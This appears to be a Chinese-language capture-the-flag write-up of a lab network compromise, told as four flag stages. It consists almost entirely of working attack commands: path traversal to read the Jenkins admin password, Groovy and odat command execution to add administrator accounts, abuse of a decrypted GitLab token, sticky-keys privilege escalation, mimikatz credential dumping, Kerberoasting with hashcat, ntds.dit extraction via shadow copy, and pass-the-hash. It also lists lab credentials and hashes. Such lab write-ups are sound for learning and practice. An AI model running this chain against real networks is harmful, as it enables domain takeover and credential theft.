目录
flag1
fscan扫外网
访问./www.zip拿到源码
tools/content-log.php存在任意文件读取
根据提示读到Jenkins初始管理员密码
./tools/content-log.php?logfile=../../../../../../../../../ProgramData/Jenkins/.jenkins/secrets/initialAdminPassword
admin/510235cf43f14e83b88a9f144199655b 登录8080端口Jenkins后台
groovy脚本命令执行,添加用户
println "net user Z3r4y 0x401@admin /add".execute().text
println "net localgroup administrators Z3r4y /add".execute().text
rdp连上去
读到flag1
flag2
上传fscan,frp,扫内网,搭代理
172.22.14.7 (XR-JENKINS)(已经拿下)
172.22.14.46 (XR-0923)
172.22.14.11 (XR-DC)
172.22.14.31 (XR-ORACLE)
172.22.14.16 (GitLab)
根据提示接下来打GitLab
找到GitLab API Token
回到脚本控制台获取对应的明文,获得gitlab PRIVATE-TOKEN
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
GitLab信息泄露利用详见
proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects" |jq |grep "http_url_to_repo"
git clone下来
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/gitlab-instance-23352f48/Monitoring.git
在xradmin/ruoyi-admin/src/main/resources/application-druid.yml找到Oracle的账密
用odat打oracle
添加用户
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user Z3r4y 0x401@admin /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators Z3r4y /add'
rdp连上31
读到flag2
flag3
再打XR-0923
internal-secret/credentials.txt里找到XR-0923的账密
zhangshuai/wSbEajHzZs直接RDP连上46
权限很低,读不了flag,需要提权
查看当前用户权限
net user zhangshuai
zhangshuai是Remote Management Use组的,可以打winrm
proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
whoami /priv
发现比RDP多了一个SeRestorePrivilege
粘滞键提权
ren C://windows/system32/sethc.exe C://windows/system32/sethc.bak
ren C://windows/system32/cmd.exe C://windows/system32/sethc.exe
回到rdp锁定用户,在登录处按5下shift触发粘滞键弹出cmd拿到SYSTEM
读到flag3
flag4
创建个管理员用户rdp上去
net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add
传个猕猴桃上去,以管理员权限运行导出哈希
privilege::debug
sekurlsa::logonpasswords
拿到XR-0923$的ntlm哈希
打kerberoasting
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':a5ac13ae0abc9935a13e81c88f638494' -dc-ip 172.22.14.11
抓tianjing的hash,写入hash.txt
hashcat -a 0 -m 13100 hash.txt rockyou.txt
hashcat爆出来tianjing密码是DPQSXSXgh2
winrm连一下
proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2
whami /priv查看用户权限,发现又多一个SeBackupPrivilege
谈谈域渗透中常见的可滥用权限及其应用场景(二)-腾讯云开发者社区-腾讯云
kali上新建一个raj.dsh
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
再用unix2dos将dsh文件的编码间距转换为Windows兼容的编码和间距
unix2dos raj.dsh
在C:/
下随便创个目录,上传raj.dsh
卷影拷贝
下载ntds.dit和system到kali上
RoboCopy /b z:\windows\ntds . ntds.dit
download ntds.dit
reg save HKLM\SYSTEM system
download system
解密出administrator的hash
impacket-secretsdump -ntds ntds.dit -system system local
打pth,winrm上去
proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"
读到flag4
type /Users/Administrator/flag/flag04.txt